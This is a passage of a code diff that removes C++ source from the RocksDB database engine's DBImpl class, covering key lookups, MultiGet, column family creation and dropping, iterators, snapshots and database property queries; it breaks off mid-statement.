-  TEST_SYNC_POINT("DBImpl::GetImpl:4");
-
-  // Prepare to store a list of merge operations if merge occurs.
-  MergeContext merge_context;
-  RangeDelAggregator range_del_agg(cfd->internal_comparator(), snapshot);
-
-  Status s;
-  // First look in the memtable, then in the immutable memtable (if any).
-  // s is both in/out. When in, s could either be OK or MergeInProgress.
-  // merge_operands will contain the sequence of merges in the latter case.
-  LookupKey lkey(key, snapshot);
-  PERF_TIMER_STOP(get_snapshot_time);
-
-  bool skip_memtable = (read_options.read_tier == kPersistedTier &&
-                        has_unpersisted_data_.load(std::memory_order_relaxed));
-  bool done = false;
-  if (!skip_memtable) {
-    if (sv->mem->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                     &range_del_agg, read_options, is_blob_index)) {
-      done = true;
-      pinnable_val->PinSelf();
-      RecordTick(stats_, MEMTABLE_HIT);
-    } else if ((s.ok() || s.IsMergeInProgress()) &&
-               sv->imm->Get(lkey, pinnable_val->GetSelf(), &s, &merge_context,
-                            &range_del_agg, read_options, is_blob_index)) {
-      done = true;
-      pinnable_val->PinSelf();
-      RecordTick(stats_, MEMTABLE_HIT);
-    }
-    if (!done && !s.ok() && !s.IsMergeInProgress()) {
-      return s;
-    }
-  }
-  if (!done) {
-    PERF_TIMER_GUARD(get_from_output_files_time);
-    sv->current->Get(read_options, lkey, pinnable_val, &s, &merge_context,
-                     &range_del_agg, value_found, nullptr, nullptr,
-                     is_blob_index);
-    RecordTick(stats_, MEMTABLE_MISS);
-  }
-
-  {
-    PERF_TIMER_GUARD(get_post_process_time);
-
-    ReturnAndCleanupSuperVersion(cfd, sv);
-
-    RecordTick(stats_, NUMBER_KEYS_READ);
-    size_t size = pinnable_val->size();
-    RecordTick(stats_, BYTES_READ, size);
-    MeasureTime(stats_, BYTES_PER_READ, size);
-    PERF_COUNTER_ADD(get_read_bytes, size);
-  }
-  return s;
-}
-
-std::vector<Status> DBImpl::MultiGet(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-
-  StopWatch sw(env_, stats_, DB_MULTIGET);
-  PERF_TIMER_GUARD(get_snapshot_time);
-
-  SequenceNumber snapshot;
-
-  struct MultiGetColumnFamilyData {
-    ColumnFamilyData* cfd;
-    SuperVersion* super_version;
-  };
-  std::unordered_map<uint32_t, MultiGetColumnFamilyData*> multiget_cf_data;
-  // fill up and allocate outside of mutex
-  for (auto cf : column_family) {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(cf);
-    auto cfd = cfh->cfd();
-    if (multiget_cf_data.find(cfd->GetID()) == multiget_cf_data.end()) {
-      auto mgcfd = new MultiGetColumnFamilyData();
-      mgcfd->cfd = cfd;
-      multiget_cf_data.insert({cfd->GetID(), mgcfd});
-    }
-  }
-
-  mutex_.Lock();
-  if (read_options.snapshot != nullptr) {
-    snapshot = reinterpret_cast<const SnapshotImpl*>(
-        read_options.snapshot)->number_;
-  } else {
-    snapshot = versions_->LastSequence();
-  }
-  for (auto mgd_iter : multiget_cf_data) {
-    mgd_iter.second->super_version =
-        mgd_iter.second->cfd->GetSuperVersion()->Ref();
-  }
-  mutex_.Unlock();
-
-  // Contain a list of merge operations if merge occurs.
-  MergeContext merge_context;
-
-  // Note: this always resizes the values array
-  size_t num_keys = keys.size();
-  std::vector<Status> stat_list(num_keys);
-  values->resize(num_keys);
-
-  // Keep track of bytes that we read for statistics-recording later
-  uint64_t bytes_read = 0;
-  PERF_TIMER_STOP(get_snapshot_time);
-
-  // For each of the given keys, apply the entire "get" process as follows:
-  // First look in the memtable, then in the immutable memtable (if any).
-  // s is both in/out. When in, s could either be OK or MergeInProgress.
-  // merge_operands will contain the sequence of merges in the latter case.
-  for (size_t i = 0; i < num_keys; ++i) {
-    merge_context.Clear();
-    Status& s = stat_list[i];
-    std::string* value = &(*values)[i];
-
-    LookupKey lkey(keys[i], snapshot);
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family[i]);
-    RangeDelAggregator range_del_agg(cfh->cfd()->internal_comparator(),
-                                     snapshot);
-    auto mgd_iter = multiget_cf_data.find(cfh->cfd()->GetID());
-    assert(mgd_iter != multiget_cf_data.end());
-    auto mgd = mgd_iter->second;
-    auto super_version = mgd->super_version;
-    bool skip_memtable =
-        (read_options.read_tier == kPersistedTier &&
-         has_unpersisted_data_.load(std::memory_order_relaxed));
-    bool done = false;
-    if (!skip_memtable) {
-      if (super_version->mem->Get(lkey, value, &s, &merge_context,
-                                  &range_del_agg, read_options)) {
-        done = true;
-        // TODO(?): RecordTick(stats_, MEMTABLE_HIT)?
-      } else if (super_version->imm->Get(lkey, value, &s, &merge_context,
-                                         &range_del_agg, read_options)) {
-        done = true;
-        // TODO(?): RecordTick(stats_, MEMTABLE_HIT)?
-      }
-    }
-    if (!done) {
-      PinnableSlice pinnable_val;
-      PERF_TIMER_GUARD(get_from_output_files_time);
-      super_version->current->Get(read_options, lkey, &pinnable_val, &s,
-                                  &merge_context, &range_del_agg);
-      value->assign(pinnable_val.data(), pinnable_val.size());
-      // TODO(?): RecordTick(stats_, MEMTABLE_MISS)?
-    }
-
-    if (s.ok()) {
-      bytes_read += value->size();
-    }
-  }
-
-  // Post processing (decrement reference counts and record statistics)
-  PERF_TIMER_GUARD(get_post_process_time);
-  autovector<SuperVersion*> superversions_to_delete;
-
-  // TODO(icanadi) do we need lock here or just around Cleanup()?
-  mutex_.Lock();
-  for (auto mgd_iter : multiget_cf_data) {
-    auto mgd = mgd_iter.second;
-    if (mgd->super_version->Unref()) {
-      mgd->super_version->Cleanup();
-      superversions_to_delete.push_back(mgd->super_version);
-    }
-  }
-  mutex_.Unlock();
-
-  for (auto td : superversions_to_delete) {
-    delete td;
-  }
-  for (auto mgd : multiget_cf_data) {
-    delete mgd.second;
-  }
-
-  RecordTick(stats_, NUMBER_MULTIGET_CALLS);
-  RecordTick(stats_, NUMBER_MULTIGET_KEYS_READ, num_keys);
-  RecordTick(stats_, NUMBER_MULTIGET_BYTES_READ, bytes_read);
-  MeasureTime(stats_, BYTES_PER_MULTIGET, bytes_read);
-  PERF_COUNTER_ADD(multiget_read_bytes, bytes_read);
-  PERF_TIMER_STOP(get_post_process_time);
-
-  return stat_list;
-}
-
-Status DBImpl::CreateColumnFamily(const ColumnFamilyOptions& cf_options,
-                                  const std::string& column_family,
-                                  ColumnFamilyHandle** handle) {
-  assert(handle != nullptr);
-  Status s = CreateColumnFamilyImpl(cf_options, column_family, handle);
-  if (s.ok()) {
-    s = WriteOptionsFile(true /*need_mutex_lock*/,
-                         true /*need_enter_write_thread*/);
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilies(
-    const ColumnFamilyOptions& cf_options,
-    const std::vector<std::string>& column_family_names,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  assert(handles != nullptr);
-  handles->clear();
-  size_t num_cf = column_family_names.size();
-  Status s;
-  bool success_once = false;
-  for (size_t i = 0; i < num_cf; i++) {
-    ColumnFamilyHandle* handle;
-    s = CreateColumnFamilyImpl(cf_options, column_family_names[i], &handle);
-    if (!s.ok()) {
-      break;
-    }
-    handles->push_back(handle);
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilies(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles) {
-  assert(handles != nullptr);
-  handles->clear();
-  size_t num_cf = column_families.size();
-  Status s;
-  bool success_once = false;
-  for (size_t i = 0; i < num_cf; i++) {
-    ColumnFamilyHandle* handle;
-    s = CreateColumnFamilyImpl(column_families[i].options,
-                               column_families[i].name, &handle);
-    if (!s.ok()) {
-      break;
-    }
-    handles->push_back(handle);
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::CreateColumnFamilyImpl(const ColumnFamilyOptions& cf_options,
-                                      const std::string& column_family_name,
-                                      ColumnFamilyHandle** handle) {
-  Status s;
-  Status persist_options_status;
-  *handle = nullptr;
-
-  s = CheckCompressionSupported(cf_options);
-  if (s.ok() && immutable_db_options_.allow_concurrent_memtable_write) {
-    s = CheckConcurrentWritesSupported(cf_options);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-
-    if (versions_->GetColumnFamilySet()->GetColumnFamily(column_family_name) !=
-        nullptr) {
-      return Status::InvalidArgument("Column family already exists");
-    }
-    VersionEdit edit;
-    edit.AddColumnFamily(column_family_name);
-    uint32_t new_id = versions_->GetColumnFamilySet()->GetNextColumnFamilyID();
-    edit.SetColumnFamily(new_id);
-    edit.SetLogNumber(logfile_number_);
-    edit.SetComparatorName(cf_options.comparator->Name());
-
-    // LogAndApply will both write the creation in MANIFEST and create
-    // ColumnFamilyData object
-    {  // write thread
-      WriteThread::Writer w;
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      // LogAndApply will both write the creation in MANIFEST and create
-      // ColumnFamilyData object
-      s = versions_->LogAndApply(nullptr, MutableCFOptions(cf_options), &edit,
-                                 &mutex_, directories_.GetDbDir(), false,
-                                 &cf_options);
-      write_thread_.ExitUnbatched(&w);
-    }
-    if (s.ok()) {
-      single_column_family_mode_ = false;
-      auto* cfd =
-          versions_->GetColumnFamilySet()->GetColumnFamily(column_family_name);
-      assert(cfd != nullptr);
-      delete InstallSuperVersionAndScheduleWork(
-          cfd, nullptr, *cfd->GetLatestMutableCFOptions());
-
-      if (!cfd->mem()->IsSnapshotSupported()) {
-        is_snapshot_supported_ = false;
-      }
-
-      cfd->set_initialized();
-
-      *handle = new ColumnFamilyHandleImpl(cfd, this, &mutex_);
-      ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                     "Created column family [%s] (ID %u)",
-                     column_family_name.c_str(), (unsigned)cfd->GetID());
-    } else {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                      "Creating column family [%s] FAILED -- %s",
-                      column_family_name.c_str(), s.ToString().c_str());
-    }
-  }  // InstrumentedMutexLock l(&mutex_)
-
-  // this is outside the mutex
-  if (s.ok()) {
-    NewThreadStatusCfInfo(
-        reinterpret_cast<ColumnFamilyHandleImpl*>(*handle)->cfd());
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamily(ColumnFamilyHandle* column_family) {
-  assert(column_family != nullptr);
-  Status s = DropColumnFamilyImpl(column_family);
-  if (s.ok()) {
-    s = WriteOptionsFile(true /*need_mutex_lock*/,
-                         true /*need_enter_write_thread*/);
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamilies(
-    const std::vector<ColumnFamilyHandle*>& column_families) {
-  Status s;
-  bool success_once = false;
-  for (auto* handle : column_families) {
-    s = DropColumnFamilyImpl(handle);
-    if (!s.ok()) {
-      break;
-    }
-    success_once = true;
-  }
-  if (success_once) {
-    Status persist_options_status = WriteOptionsFile(
-        true /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    if (s.ok() && !persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  }
-  return s;
-}
-
-Status DBImpl::DropColumnFamilyImpl(ColumnFamilyHandle* column_family) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  if (cfd->GetID() == 0) {
-    return Status::InvalidArgument("Can't drop default column family");
-  }
-
-  bool cf_support_snapshot = cfd->mem()->IsSnapshotSupported();
-
-  VersionEdit edit;
-  edit.DropColumnFamily();
-  edit.SetColumnFamily(cfd->GetID());
-
-  Status s;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (cfd->IsDropped()) {
-      s = Status::InvalidArgument("Column family already dropped!\n");
-    }
-    if (s.ok()) {
-      // we drop column family from a single write thread
-      WriteThread::Writer w;
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      s = versions_->LogAndApply(cfd, *cfd->GetLatestMutableCFOptions(),
-                                 &edit, &mutex_);
-      write_thread_.ExitUnbatched(&w);
-    }
-    if (s.ok()) {
-      auto* mutable_cf_options = cfd->GetLatestMutableCFOptions();
-      max_total_in_memory_state_ -= mutable_cf_options->write_buffer_size *
-                                    mutable_cf_options->max_write_buffer_number;
-    }
-
-    if (!cf_support_snapshot) {
-      // Dropped Column Family doesn't support snapshot. Need to recalculate
-      // is_snapshot_supported_.
-      bool new_is_snapshot_supported = true;
-      for (auto c : *versions_->GetColumnFamilySet()) {
-        if (!c->IsDropped() && !c->mem()->IsSnapshotSupported()) {
-          new_is_snapshot_supported = false;
-          break;
-        }
-      }
-      is_snapshot_supported_ = new_is_snapshot_supported;
-    }
-  }
-
-  if (s.ok()) {
-    // Note that here we erase the associated cf_info of the to-be-dropped
-    // cfd before its ref-count goes to zero to avoid having to erase cf_info
-    // later inside db_mutex.
-    EraseThreadStatusCfInfo(cfd);
-    assert(cfd->IsDropped());
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "Dropped column family with id %u\n", cfd->GetID());
-  } else {
-    ROCKS_LOG_ERROR(immutable_db_options_.info_log,
-                    "Dropping column family with id %u FAILED -- %s\n",
-                    cfd->GetID(), s.ToString().c_str());
-  }
-
-  return s;
-}
-
-bool DBImpl::KeyMayExist(const ReadOptions& read_options,
-                         ColumnFamilyHandle* column_family, const Slice& key,
-                         std::string* value, bool* value_found) {
-  assert(value != nullptr);
-  if (value_found != nullptr) {
-    // falsify later if key-may-exist but can't fetch value
-    *value_found = true;
-  }
-  ReadOptions roptions = read_options;
-  roptions.read_tier = kBlockCacheTier; // read from block cache only
-  PinnableSlice pinnable_val;
-  auto s = GetImpl(roptions, column_family, key, &pinnable_val, value_found);
-  value->assign(pinnable_val.data(), pinnable_val.size());
-
-  // If block_cache is enabled and the index block of the table didn't
-  // not present in block_cache, the return value will be Status::Incomplete.
-  // In this case, key may still exist in the table.
-  return s.ok() || s.IsIncomplete();
-}
-
-Iterator* DBImpl::NewIterator(const ReadOptions& read_options,
-                              ColumnFamilyHandle* column_family) {
-  if (read_options.read_tier == kPersistedTier) {
-    return NewErrorIterator(Status::NotSupported(
-        "ReadTier::kPersistedData is not yet supported in iterators."));
-  }
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-  if (read_options.managed) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-    return NewErrorIterator(Status::InvalidArgument(
-        "Managed Iterators not supported in RocksDBLite."));
-#else
-    if ((read_options.tailing) || (read_options.snapshot != nullptr) ||
-        (is_snapshot_supported_)) {
-      return new ManagedIterator(this, read_options, cfd);
-    }
-    // Managed iter not supported
-    return NewErrorIterator(Status::InvalidArgument(
-        "Managed Iterators not supported without snapshots."));
-#endif
-  } else if (read_options.tailing) {
-#ifdef ROCKSDB_LITE
-    // not supported in lite version
-    return nullptr;
-#else
-    SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-    auto iter = new ForwardIterator(this, read_options, cfd, sv);
-    return NewDBIterator(
-        env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter,
-        kMaxSequenceNumber,
-        sv->mutable_cf_options.max_sequential_skip_in_iterations);
-#endif
-  } else {
-    SequenceNumber latest_snapshot = versions_->LastSequence();
-    auto snapshot =
-        read_options.snapshot != nullptr
-            ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                  ->number_
-            : latest_snapshot;
-    return NewIteratorImpl(read_options, cfd, snapshot);
-  }
-  // To stop compiler from complaining
-  return nullptr;
-}
-
-ArenaWrappedDBIter* DBImpl::NewIteratorImpl(const ReadOptions& read_options,
-                                            ColumnFamilyData* cfd,
-                                            SequenceNumber snapshot,
-                                            bool allow_blob) {
-  SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-
-  // Try to generate a DB iterator tree in continuous memory area to be
-  // cache friendly. Here is an example of result:
-  // +-------------------------------+
-  // |                               |
-  // | ArenaWrappedDBIter            |
-  // |  +                            |
-  // |  +---> Inner Iterator   ------------+
-  // |  |                            |     |
-  // |  |    +-- -- -- -- -- -- -- --+     |
-  // |  +--- | Arena                 |     |
-  // |       |                       |     |
-  // |          Allocated Memory:    |     |
-  // |       |   +-------------------+     |
-  // |       |   | DBIter            | <---+
-  // |           |  +                |
-  // |       |   |  +-> iter_  ------------+
-  // |       |   |                   |     |
-  // |       |   +-------------------+     |
-  // |       |   | MergingIterator   | <---+
-  // |           |  +                |
-  // |       |   |  +->child iter1  ------------+
-  // |       |   |  |                |          |
-  // |           |  +->child iter2  ----------+ |
-  // |       |   |  |                |        | |
-  // |       |   |  +->child iter3  --------+ | |
-  // |           |                   |      | | |
-  // |       |   +-------------------+      | | |
-  // |       |   | Iterator1         | <--------+
-  // |       |   +-------------------+      | |
-  // |       |   | Iterator2         | <------+
-  // |       |   +-------------------+      |
-  // |       |   | Iterator3         | <----+
-  // |       |   +-------------------+
-  // |       |                       |
-  // +-------+-----------------------+
-  //
-  // ArenaWrappedDBIter inlines an arena area where all the iterators in
-  // the iterator tree are allocated in the order of being accessed when
-  // querying.
-  // Laying out the iterators in the order of being accessed makes it more
-  // likely that any iterator pointer is close to the iterator it points to so
-  // that they are likely to be in the same cache line and/or page.
-  ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator(
-      env_, read_options, *cfd->ioptions(), snapshot,
-      sv->mutable_cf_options.max_sequential_skip_in_iterations,
-      sv->version_number, ((read_options.snapshot != nullptr) ? nullptr : this),
-      cfd, allow_blob);
-
-  InternalIterator* internal_iter =
-      NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(),
-                          db_iter->GetRangeDelAggregator());
-  db_iter->SetIterUnderDBIter(internal_iter);
-
-  return db_iter;
-}
-
-Status DBImpl::NewIterators(
-    const ReadOptions& read_options,
-    const std::vector<ColumnFamilyHandle*>& column_families,
-    std::vector<Iterator*>* iterators) {
-  if (read_options.read_tier == kPersistedTier) {
-    return Status::NotSupported(
-        "ReadTier::kPersistedData is not yet supported in iterators.");
-  }
-  iterators->clear();
-  iterators->reserve(column_families.size());
-  if (read_options.managed) {
-#ifdef ROCKSDB_LITE
-    return Status::InvalidArgument(
-        "Managed interator not supported in RocksDB lite");
-#else
-    if ((!read_options.tailing) && (read_options.snapshot == nullptr) &&
-        (!is_snapshot_supported_)) {
-      return Status::InvalidArgument(
-          "Managed interator not supported without snapshots");
-    }
-    for (auto cfh : column_families) {
-      auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-      auto iter = new ManagedIterator(this, read_options, cfd);
-      iterators->push_back(iter);
-    }
-#endif
-  } else if (read_options.tailing) {
-#ifdef ROCKSDB_LITE
-    return Status::InvalidArgument(
-        "Tailing interator not supported in RocksDB lite");
-#else
-    for (auto cfh : column_families) {
-      auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(cfh)->cfd();
-      SuperVersion* sv = cfd->GetReferencedSuperVersion(&mutex_);
-      auto iter = new ForwardIterator(this, read_options, cfd, sv);
-      iterators->push_back(NewDBIterator(
-          env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter,
-          kMaxSequenceNumber,
-          sv->mutable_cf_options.max_sequential_skip_in_iterations));
-    }
-#endif
-  } else {
-    SequenceNumber latest_snapshot = versions_->LastSequence();
-    auto snapshot =
-        read_options.snapshot != nullptr
-            ? reinterpret_cast<const SnapshotImpl*>(read_options.snapshot)
-                  ->number_
-            : latest_snapshot;
-
-    for (size_t i = 0; i < column_families.size(); ++i) {
-      auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(
-          column_families[i])->cfd();
-      iterators->push_back(NewIteratorImpl(read_options, cfd, snapshot));
-    }
-  }
-
-  return Status::OK();
-}
-
-const Snapshot* DBImpl::GetSnapshot() { return GetSnapshotImpl(false); }
-
-#ifndef ROCKSDB_LITE
-const Snapshot* DBImpl::GetSnapshotForWriteConflictBoundary() {
-  return GetSnapshotImpl(true);
-}
-#endif  // ROCKSDB_LITE
-
-const Snapshot* DBImpl::GetSnapshotImpl(bool is_write_conflict_boundary) {
-  int64_t unix_time = 0;
-  env_->GetCurrentTime(&unix_time);  // Ignore error
-  SnapshotImpl* s = new SnapshotImpl;
-
-  InstrumentedMutexLock l(&mutex_);
-  // returns null if the underlying memtable does not support snapshot.
-  if (!is_snapshot_supported_) {
-    delete s;
-    return nullptr;
-  }
-  return snapshots_.New(s, versions_->LastSequence(), unix_time,
-                        is_write_conflict_boundary);
-}
-
-void DBImpl::ReleaseSnapshot(const Snapshot* s) {
-  const SnapshotImpl* casted_s = reinterpret_cast<const SnapshotImpl*>(s);
-  {
-    InstrumentedMutexLock l(&mutex_);
-    snapshots_.Delete(casted_s);
-  }
-  delete casted_s;
-}
-
-bool DBImpl::HasActiveSnapshotInRange(SequenceNumber lower_bound,
-                                      SequenceNumber upper_bound) {
-  InstrumentedMutexLock l(&mutex_);
-  return snapshots_.HasSnapshotInRange(lower_bound, upper_bound);
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                        TablePropertiesCollection* props) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Increment the ref count
-  mutex_.Lock();
-  auto version = cfd->current();
-  version->Ref();
-  mutex_.Unlock();
-
-  auto s = version->GetPropertiesOfAllTables(props);
-
-  // Decrement the ref count
-  mutex_.Lock();
-  version->Unref();
-  mutex_.Unlock();
-
-  return s;
-}
-
-Status DBImpl::GetPropertiesOfTablesInRange(ColumnFamilyHandle* column_family,
-                                            const Range* range, std::size_t n,
-                                            TablePropertiesCollection* props) {
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Increment the ref count
-  mutex_.Lock();
-  auto version = cfd->current();
-  version->Ref();
-  mutex_.Unlock();
-
-  auto s = version->GetPropertiesOfTablesInRange(range, n, props);
-
-  // Decrement the ref count
-  mutex_.Lock();
-  version->Unref();
-  mutex_.Unlock();
-
-  return s;
-}
-
-#endif  // ROCKSDB_LITE
-
-const std::string& DBImpl::GetName() const {
-  return dbname_;
-}
-
-Env* DBImpl::GetEnv() const {
-  return env_;
-}
-
-Options DBImpl::GetOptions(ColumnFamilyHandle* column_family) const {
-  InstrumentedMutexLock l(&mutex_);
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  return Options(BuildDBOptions(immutable_db_options_, mutable_db_options_),
-                 cfh->cfd()->GetLatestCFOptions());
-}
-
-DBOptions DBImpl::GetDBOptions() const {
-  InstrumentedMutexLock l(&mutex_);
-  return BuildDBOptions(immutable_db_options_, mutable_db_options_);
-}
-
-bool DBImpl::GetProperty(ColumnFamilyHandle* column_family,
-                         const Slice& property, std::string* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  value->clear();
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (property_info == nullptr) {
-    return false;
-  } else if (property_info->handle_int) {
-    uint64_t int_value;
-    bool ret_value =
-        GetIntPropertyInternal(cfd, *property_info, false, &int_value);
-    if (ret_value) {
-      *value = ToString(int_value);
-    }
-    return ret_value;
-  } else if (property_info->handle_string) {
-    InstrumentedMutexLock l(&mutex_);
-    return cfd->internal_stats()->GetStringProperty(*property_info, property,
-                                                    value);
-  }
-  // Shouldn't reach here since exactly one of handle_string and handle_int
-  // should be non-nullptr.
-  assert(false);
-  return false;
-}
-
-bool DBImpl::GetMapProperty(ColumnFamilyHandle* column_family,
-                            const Slice& property,
-                            std::map<std::string, double>* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  value->clear();
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (property_info == nullptr) {
-    return false;
-  } else if (property_info->handle_map) {
-    InstrumentedMutexLock l(&mutex_);
-    return cfd->internal_stats()->GetMapProperty(*property_info, property,
-                                                 value);
-  }
-  // If we reach this point it means that handle_map is not provided for the
-  // requested property
-  return false;
-}
-
-bool DBImpl::GetIntProperty(ColumnFamilyHandle* column_family,
-                            const Slice& property, uint64_t* value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  if (property_info == nullptr || property_info->handle_int == nullptr) {
-    return false;
-  }
-  auto cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  return GetIntPropertyInternal(cfd, *property_info, false, value);
-}
-
-bool DBImpl::GetIntPropertyInternal(ColumnFamilyData* cfd,
-                                    const DBPropertyInfo& property_info,
-                                    bool is_locked, uint64_t* value) {
-  assert(property_info.handle_int != nullptr);
-  if (!property_info.need_out_of_mutex) {
-    if (is_locked) {
-      mutex_.AssertHeld();
-      return cfd->internal_stats()->GetIntProperty(property_info, value, this);
-    } else {
-      InstrumentedMutexLock l(&mutex_);
-      return cfd->internal_stats()->GetIntProperty(property_info, value, this);
-    }
-  } else {
-    SuperVersion* sv = nullptr;
-    if (!is_locked) {
-      sv = GetAndRefSuperVersion(cfd);
-    } else {
-      sv = cfd->GetSuperVersion();
-    }
-
-    bool ret = cfd->internal_stats()->GetIntPropertyOutOfMutex(
-        property_info, sv->current, value);
-
-    if (!is_locked) {
-      ReturnAndCleanupSuperVersion(cfd, sv);
-    }
-
-    return ret;
-  }
-}
-
-#ifndef ROCKSDB_LITE
-Status DBImpl::ResetStats() {
-  InstrumentedMutexLock l(&mutex_);
-  for (auto* cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->initialized()) {
-      cfd->internal_stats()->Clear();
-    }
-  }
-  return Status::OK();
-}
-#endif  // ROCKSDB_LITE
-
-bool DBImpl::GetAggregatedIntProperty(const Slice& property,
-                                      uint64_t* aggregated_value) {
-  const DBPropertyInfo* property_info = GetPropertyInfo(property);
-  if (property_info == nullptr || property_info->handle_int == nullptr) {
-    return false;
-  }
-
-  uint64_t sum = 0;
-  {
-    // Needs mutex to protect the list of column families.
-    InstrumentedMutexLock l(&mutex_);
-    uint64_t value;
-    for (auto* cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->initialized()) {
-        continue;
-      }
-      if (GetIntPropertyInternal(cfd, *property_info, true, &value)) {
-        sum += value;
-      } else {
-        return false;
-      }
-    }
-  }
-  *aggregated_value = sum;
-  return true;
-}
-
-SuperVersion* DBImpl::GetAndRefSuperVersion(ColumnFamilyData* cfd) {
-  // TODO(ljin): consider using GetReferencedSuperVersion() directly
-  return cfd->GetThreadLocalSuperVersion(&mutex_);
-}
-
-// REQUIRED: this function should only be called on the write thread or if the
-// mutex is held.
-SuperVersion* DBImpl::GetAndRefSuperVersion(uint32_t column_family_id) {
-  auto column_family_set = versions_->GetColumnFamilySet();
-  auto cfd = column_family_set->GetColumnFamily(column_family_id);
-  if (!cfd) {
-    return nullptr;
-  }
-
-  return GetAndRefSuperVersion(cfd);
-}
-
-void DBImpl::ReturnAndCleanupSuperVersion(ColumnFamilyData* cfd,
-                                          SuperVersion* sv) {
-  bool unref_sv = !cfd->ReturnThreadLocalSuperVersion(sv);
-
-  if (unref_sv) {
-    // Release SuperVersion
-    if (sv->Unref()) {
-      {
-        InstrumentedMutexLock l(&mutex_);
-        sv->Cleanup();
-      }
-      delete sv;
-      RecordTick(stats_, NUMBER_SUPERVERSION_CLEANUPS);
-    }
-    RecordTick(stats_, NUMBER_SUPERVERSION_RELEASES);
-  }
-}
-
-// REQUIRED: this function should only be called on the write thread.
-void DBImpl::ReturnAndCleanupSuperVersion(uint32_t column_family_id,
-                                          SuperVersion* sv) {
-  auto column_family_set = versions_->GetColumnFamilySet();
-  auto cfd = column_family_set->GetColumnFamily(column_family_id);
-
-  // If SuperVersion is held, and we successfully fetched a cfd using
-  // GetAndRefSuperVersion(), it must still exist.
-  assert(cfd != nullptr);
-  ReturnAndCleanupSuperVersion(cfd, sv);
-}
-
-// REQUIRED: this function should only be called on the write thread or if the
-// mutex is held.
-ColumnFamilyHandle* DBImpl::GetColumnFamilyHandle(uint32_t column_family_id) {
-  ColumnFamilyMemTables* cf_memtables = column_family_memtables_.get();
-
-  if (!cf_memtables->Seek(column_family_id)) {
-    return nullptr;
-  }
-
-  return cf_memtables->GetColumnFamilyHandle();
-}
-
-// REQUIRED: mutex is NOT held.
-ColumnFamilyHandle* DBImpl::GetColumnFamilyHandleUnlocked(
-    uint32_t column_family_id) {
-  ColumnFamilyMemTables* cf_memtables = column_family_memtables_.get();
-
-  InstrumentedMutexLock l(&mutex_);
-
-  if (!cf_memtables->Seek(column_family_id)) {
-    return nullptr;
-  }
-
-  return cf_memtables->GetColumnFamilyHandle();
-}
-
-void DBImpl::GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                         const Range& range,
-                                         uint64_t* const count,
-                                         uint64_t* const size) {
-  ColumnFamilyHandleImpl* cfh =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  ColumnFamilyData* cfd = cfh->cfd();
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-
-  // Convert user_key into a corresponding internal key.
-  InternalKey k1(range.start, kMaxSequenceNumber, kValueTypeForSeek);
-  InternalKey k2(range.limit, kMaxSequenceNumber, kValueTypeForSeek);
-  MemTable::MemTableStats memStats =
-      sv->mem->ApproximateStats(k1.Encode(), k2.Encode());
-  MemTable::MemTableStats immStats =
